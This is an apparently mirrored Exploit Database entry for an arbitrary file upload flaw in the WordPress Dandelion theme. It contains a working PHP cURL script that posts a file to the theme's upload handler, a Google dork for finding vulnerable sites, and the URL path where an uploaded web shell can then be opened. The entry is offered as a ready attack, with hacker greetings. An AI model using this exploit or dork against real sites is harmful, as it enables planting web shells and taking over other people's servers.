WordPress Theme Dandelion – Arbitrary File Upload

• Exploit Database
• 31 阅读

• 作者： TheBlackMonster
  日期： 2014-02-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/31424/

• # Exploit Title: WordPress Dandelion Themes Arbitry File Upload
  # Google Dork: inurl:/wp-content/themes/dandelion/
  # Date: 31/01/2014
  # Exploit Author: TheBlackMonster (Marouane)
  # Vendor Homepage: http://themeforest.net/item/dandelion-powerful-elegant-wordpress-theme/136628
  # Software Link: Not Available
  # Version: Web Application
  # Tested on: Mozilla, Chrome, Opera -> Windows & Linux
  ‪#‎Greetz‬ : PhantomGhost, Deto Beiber, All Moroccan Hackers.
  
  We are Moroccans, we are genuis !
  
  <?php
  $uploadfile="yourfile.php";
  $ch = curl_init("http://127.0.0.1/wp-content/themes/dandelion/functions/upload-handler.php");
  curl_setopt($ch, CURLOPT_POST, true); 
  curl_setopt($ch, CURLOPT_POSTFIELDS,
  array('Filedata'=>"@$uploadfile"));
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  $postResult = curl_exec($ch);
  curl_close($ch);
  print "$postResult";
  ?>
  
  File Access :
  
  http://127.0.0.1/uploads/[years]/[month]/your_shell.php